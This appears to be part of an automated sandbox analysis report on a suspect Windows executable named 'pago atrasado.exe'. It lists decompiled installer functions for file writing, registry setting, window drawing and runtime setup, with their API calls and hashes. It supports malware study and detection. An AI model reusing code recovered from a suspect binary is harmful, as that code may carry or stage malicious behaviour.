                                            0x00405e6e
                                            0x00405e6f
                                            0x00405e72
                                            0x00405e7a
                                            0x00405e7c
                                            0x00405e80
                                            0x00000000
                                            0x00000000
                                            0x00405e86
                                            0x00405e8b
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00405e8b
                                            0x00405e90

                                            APIs
                                            • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\pago atrasado.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E52
                                            • CharNextA.USER32(?,?,?,00000000), ref: 00405E5F
                                            • CharNextA.USER32(?,"C:\Users\user\Desktop\pago atrasado.exe" ,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E64
                                            • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004030D6,C:\Users\user\AppData\Local\Temp\,?,00403289), ref: 00405E74
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Char$Next$Prev
                                            • String ID: "C:\Users\user\Desktop\pago atrasado.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                            • API String ID: 589700163-2752564856
                                            • Opcode ID: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                            • Instruction ID: 8fb4f4a5a46673644b6d17db89182f96b33943a1441b7055d0135b6347a17e40
                                            • Opcode Fuzzy Hash: ce236f4316dc44970b3d4854ee077085f8211c330c8e5a50d5c3ec65e4e49f20
                                            • Instruction Fuzzy Hash: 0411B971804A9029EB321734DC44B7B7F88CB9A7A0F18447BD9D4722C2D67C5E429BED
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00403EBB, Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00403EBB(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}








                                            0x00403ecd
                                            0x00403f61
                                            0x00000000
                                            0x00403f61
                                            0x00403ede
                                            0x00403ee2
                                            0x00000000
                                            0x00000000
                                            0x00403ee8
                                            0x00403ef1
                                            0x00403ef4
                                            0x00403ef4
                                            0x00403efa
                                            0x00403f00
                                            0x00403f00
                                            0x00403f0c
                                            0x00403f12
                                            0x00403f19
                                            0x00403f1c
                                            0x00403f1f
                                            0x00403f21
                                            0x00403f21
                                            0x00403f29
                                            0x00403f2f
                                            0x00403f2f
                                            0x00403f39
                                            0x00403f3e
                                            0x00403f41
                                            0x00403f46
                                            0x00403f49
                                            0x00403f49
                                            0x00403f59
                                            0x00403f59
                                            0x00000000

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                            • Instruction ID: 51638b03811fbd3f25a4eb1d810876b9f584da0c3187da66c7daa715c1b02470
                                            • Opcode Fuzzy Hash: c17ffa4718e249222cf94fd394cb2cb31c18988dc7419d15a412fba3cf9ed351
                                            • Instruction Fuzzy Hash: 08218471904745ABCB219F78DD08B4BBFF8AF05715B048629F856E22E0D734E904CB55
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 004026AF, Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 86%
                                            			E004026AF(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *((intOrPtr*)(_t58 - 0xc)) = 0xfffffd66;
				_t52 = E00402A29(0xfffffff0);
				 *(_t58 - 0x38) = _t24;
				if(E004056F8(_t52) == 0) {
					E00402A29(0xffffffed);
				}
				E00405850(_t52);
				_t27 = E0040586F(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423f54; // 0x8200
					 *(_t58 - 0x30) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004030B3(_t47);
						E00403081(_t51,  *(_t58 - 0x30));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x20));
						 *(_t58 - 0x34) = _t56;
						if(_t56 != _t47) {
							E00402E8E( *((intOrPtr*)(_t58 - 0x24)), _t47, _t56,  *(_t58 - 0x20));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x48) =  *_t56;
								E00405830( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x48);
							}
							GlobalFree( *(_t58 - 0x34));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x30), _t58 - 0x3c, _t47);
						GlobalFree(_t51);
						 *((intOrPtr*)(_t58 - 0xc)) = E00402E8E(0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *((intOrPtr*)(_t58 - 0xc)) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x38));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}











                                            0x004026af
                                            0x004026b1
                                            0x004026bd
                                            0x004026c0
                                            0x004026ca
                                            0x004026ce
                                            0x004026ce
                                            0x004026d4
                                            0x004026e1
                                            0x004026e9
                                            0x004026ec
                                            0x004026f2
                                            0x00402700
                                            0x00402705
                                            0x00402709
                                            0x0040270c
                                            0x00402715
                                            0x00402721
                                            0x00402725
                                            0x00402728
                                            0x00402732
                                            0x00402751
                                            0x00402739
                                            0x0040273e
                                            0x00402746
                                            0x00402749
                                            0x0040274e
                                            0x0040274e
                                            0x00402758
                                            0x00402758
                                            0x0040276a
                                            0x00402771
                                            0x00402783
                                            0x00402783
                                            0x00402789
                                            0x00402789
                                            0x00402794
                                            0x00402795
                                            0x00402799
                                            0x0040279d
                                            0x004027a3
                                            0x004027a3
                                            0x004027aa
                                            0x00402197
                                            0x004028c1
                                            0x004028cd

                                            APIs
                                            • GlobalAlloc.KERNEL32(00000040,00008200,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402703
                                            • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 0040271F
                                            • GlobalFree.KERNEL32 ref: 00402758
                                            • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,000000F0), ref: 0040276A
                                            • GlobalFree.KERNEL32 ref: 00402771
                                            • CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402789
                                            • DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040279D
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                            • String ID:
                                            • API String ID: 3294113728-0
                                            • Opcode ID: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                            • Instruction ID: c2c7835655fcdbd4aa1197060f7bd229eae72b48ff88aadc8082708ad166979d
                                            • Opcode Fuzzy Hash: 86c275f08be09aec70893b32aeacbca8804cc45ae7d70b5d5ba6e64a6a3d4a6c
                                            • Instruction Fuzzy Hash: 9A31AD71C00128BBCF216FA5DE88DAEBA79EF04364F14423AF924762E0C67949418B99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404E84, Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00404E84(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423724; // 0x0
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423ff4; // 0x0
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405BBA(0, _t39, 0x41fd10, 0x41fd10, _a4);
					}
					_t26 = lstrlenA(0x41fd10);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423708, 0x41fd10);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fd10;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fd10)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fd10, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

















                                            0x00404e8a
                                            0x00404e96
                                            0x00404e99
                                            0x00404e9f
                                            0x00404eab
                                            0x00404eae
                                            0x00404eb1
                                            0x00404eb7
                                            0x00404eb7
                                            0x00404ebd
                                            0x00404ec5
                                            0x00404ec8
                                            0x00404ee5
                                            0x00404ee9
                                            0x00404ef2
                                            0x00404ef2
                                            0x00404efc
                                            0x00404f05
                                            0x00404f11
                                            0x00404f18
                                            0x00404f1c
                                            0x00404f1f
                                            0x00404f32
                                            0x00404f40
                                            0x00404f40
                                            0x00404f44
                                            0x00404f46
                                            0x00404f49
                                            0x00000000
                                            0x00404f49
                                            0x00404eca
                                            0x00404ed2
                                            0x00404eda
                                            0x00404ee0
                                            0x00000000
                                            0x00404ee0
                                            0x00404eda
                                            0x00404ec8
                                            0x00404f53

                                            APIs
                                            • lstrlenA.KERNEL32(0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000,?), ref: 00404EBD
                                            • lstrlenA.KERNEL32(00402FBE,0041FD10,00000000,0040F0E0,00000000,?,?,?,?,?,?,?,?,?,00402FBE,00000000), ref: 00404ECD
                                            • lstrcatA.KERNEL32(0041FD10,00402FBE,00402FBE,0041FD10,00000000,0040F0E0,00000000), ref: 00404EE0
                                            • SetWindowTextA.USER32(0041FD10,0041FD10), ref: 00404EF2
                                            • SendMessageA.USER32 ref: 00404F18
                                            • SendMessageA.USER32 ref: 00404F32
                                            • SendMessageA.USER32 ref: 00404F40
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2531174081-0
                                            • Opcode ID: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                            • Instruction ID: 29716f0e6f05b21b32fe67f81276caf5577c11483a64657c7043e00463a136c9
                                            • Opcode Fuzzy Hash: 71e37258a37026cf273fcfa99aead3f8e91a2c4ccac8b3bb5b1c98b8a192fec2
                                            • Instruction Fuzzy Hash: 21218EB1900118BBDF119FA5DC849DFBFB9FB44354F10807AF904A6290C7789E418BA8
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00404753, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00404753(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}














                                            0x00404761
                                            0x0040476e
                                            0x00404774
                                            0x004047b2
                                            0x004047b2
                                            0x004047c1
                                            0x004047c8
                                            0x00000000
                                            0x004047ca
                                            0x00404776
                                            0x00404785
                                            0x0040478d
                                            0x00404790
                                            0x004047a2
                                            0x004047a8
                                            0x004047af
                                            0x00000000
                                            0x004047af
                                            0x00000000

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                            • Instruction ID: b5292072505f589c3e6e61736795eac3e8b5c463abbfbac9e5f2f3c06e421abf
                                            • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                            • Instruction Fuzzy Hash: BE015275D00219BADB00DB94DC45BFEBBBCAB55715F10412BBB10B71C1C7B465418BA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 1000CB96, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 91%
                                            			E1000CB96(void* __ebx, void* __edi, void* __eflags) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E10008826(_t3);
				if(E10009FFA() != 0) {
					_t6 = E10009B7B(E1000C978);
					 *0x1001bd90 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E1000A399(1, 0x3bc);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E1000CC0C();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E10009BD7( *0x1001bd90, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E1000CAE3(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E1000CC0C();
					return 0;
				}
			}








                                            0x1000cb96
                                            0x1000cba2
                                            0x1000cbb1
                                            0x1000cbb6
                                            0x1000cbbc
                                            0x1000cbbf
                                            0x00000000
                                            0x1000cbc1
                                            0x1000cbce
                                            0x1000cbd2
                                            0x1000cbd4
                                            0x1000cc03
                                            0x1000cc03
                                            0x1000cc08
                                            0x1000cc0b
                                            0x1000cbd6
                                            0x1000cbe4
                                            0x1000cbe6
                                            0x00000000
                                            0x1000cbe8
                                            0x1000cbe8
                                            0x1000cbea
                                            0x1000cbeb
                                            0x1000cbf2
                                            0x1000cbf8
                                            0x1000cbfc
                                            0x1000cc00
                                            0x1000cc02
                                            0x1000cc02
                                            0x1000cbe6
                                            0x1000cbd4
                                            0x1000cba4
                                            0x1000cba4
                                            0x1000cba4
                                            0x1000cbab
                                            0x1000cbab

                                            APIs
                                            • __init_pointers.LIBCMT ref: 1000CB96
                                              • Part of subcall function 10008826: RtlEncodePointer.NTDLL(00000000,00000001,1000CB9B,10012851,10019380,00000008,10012A19,?,00000001,?,100193A0,0000000C,10012AE9,?,00000001,?), ref: 10008829
                                              • Part of subcall function 10008826: __initp_misc_winsig.LIBCMT ref: 10008844
                                              • Part of subcall function 10008826: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 10009C3C
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 10009C50
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 10009C63
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 10009C76
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 10009C89
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 10009C9C
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 10009CAF
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 10009CC2
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 10009CD5
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 10009CE8
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 10009CFB
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 10009D0E
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 10009D21
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 10009D34
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 10009D47
                                              • Part of subcall function 10008826: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 10009D5A
                                            • __mtinitlocks.LIBCMT ref: 1000CB9B
                                            • __mtterm.LIBCMT ref: 1000CBA4
                                            • __calloc_crt.LIBCMT ref: 1000CBC9
                                            • __initptd.LIBCMT ref: 1000CBEB
                                            • GetCurrentThreadId.KERNEL32 ref: 1000CBF2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: AddressProc$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                                            • String ID:
                                            • API String ID: 1593083391-0
                                            • Opcode ID: 18e6203171b5f6703930a5e256d13ae9aa06e9cd8fd6f9546cccf5ed6b71eac2
                                            • Instruction ID: 02d96f7580899f1a259af74a0d0048c593b74cff88c672cacd3a2994c246b3cf
                                            • Opcode Fuzzy Hash: 18e6203171b5f6703930a5e256d13ae9aa06e9cd8fd6f9546cccf5ed6b71eac2
                                            • Instruction Fuzzy Hash: F7F09036519B2A5AF224E774BC47E8A36C0DF022F4B304729F0A9D50EDFF21E9414291
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402B6E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x40b0d8; // 0x8200
					_t11 =  *0x41f0e8;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                            0x00402b7b
                                            0x00402b89
                                            0x00402b8f
                                            0x00402b8f
                                            0x00402b9d
                                            0x00402b9f
                                            0x00402ba5
                                            0x00402bac
                                            0x00402bae
                                            0x00402bae
                                            0x00402bc4
                                            0x00402bd4
                                            0x00402be6
                                            0x00402be6
                                            0x00402bee

                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                            • MulDiv.KERNEL32(00008200,00000064,?), ref: 00402BB4
                                            • wsprintfA.USER32 ref: 00402BC4
                                            • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                            • SetDlgItemTextA.USER32 ref: 00402BE6
                                            Strings
                                            • verifying installer: %d%%, xrefs: 00402BBE
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.248853069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000000.00000002.248849693.0000000000400000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248859062.0000000000407000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248866383.0000000000409000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248879905.0000000000422000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248885504.000000000042A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.248890779.000000000042D000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: verifying installer: %d%%
                                            • API String ID: 1451636040-82062127
                                            • Opcode ID: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                            • Instruction ID: c6984150c403b35497dc18a40ce28a5dc8b104db4e9527dfc76b44ca96ff41d6
                                            • Opcode Fuzzy Hash: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                            • Instruction Fuzzy Hash: 5D01FF70A44208BBEB209F60DD49EEE3769FB04345F008039FA06A92D1D7B5AA558F99
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 10001100, Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 286COMMON
                                            Download Yara Rule
                                            Strings
                                            • E8 transform detected; file size %u, xrefs: 1000142A
                                            • setting window to 0x%X, xrefs: 1000134D
                                            • decoding stream of size %u to size %u, starting at %u, xrefs: 1000115F
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.250579809.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                            • Associated: 00000000.00000002.250573153.0000000010000000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250606846.0000000010014000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250615205.000000001001A000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.250625298.000000001001F000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID:
                                            • String ID: E8 transform detected; file size %u$decoding stream of size %u to size %u, starting at %u$setting window to 0x%X
                                            • API String ID: 0-4286174769
                                            • Opcode ID: 347821c0b590c84ff46a00d1acb6a352d551c073a430cad62b225cf9ebc3db1c
                                            • Instruction ID: 22d4f3012f543e3c1a0865e5157f0e6ad265d6f6b6cc205a56271a634936d0f9
                                            • Opcode Fuzzy Hash: 347821c0b590c84ff46a00d1acb6a352d551c073a430cad62b225cf9ebc3db1c
                                            • Instruction Fuzzy Hash: 78E19FB4904209DFDB04CFA8D590AEEBBF1FF48344F208519E849A7345D775A985CFA2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00402336, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 85%
                                            			E00402336(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				signed int _t30;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B1E(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A29(2);
				_t18 = E00402A29(0x11);
				_t30 =  *0x423ff0; // 0x0
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27, _t30 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A29(0x23);
						_t19 = lstrlenA(0x40a410) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A0C(3);
						 *0x40a410 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a410, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a410, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423fc8 =  *0x423fc8 +  *(_t37 - 4);
				return 0;
			}











                                            0x00402337
                                            0x0040233c
                                            0x00402346
                                            0x00402350
                                            0x00402353
                                            0x0040235d
                                            0x0040236d
                                            0x00402374
                                            0x0040237c
                                            0x0040238a
                                            0x0040238e
                                            0x00402399
                                            0x00402399
                                            0x0040239d
                                            0x004023a1
                                            0x004023a7
                                            0x004023ac
                                            0x004023ac
                                            0x004023b0
                                            0x004023bc
                                            0x004023bc
                                            0x004023d5
                                            0x004023d7
                                            0x004023d7
                                            0x004023da
                                            0x004024b0
                                            0x004024b0
                                            0x004028c1
                                            0x004028cd

                                            APIs
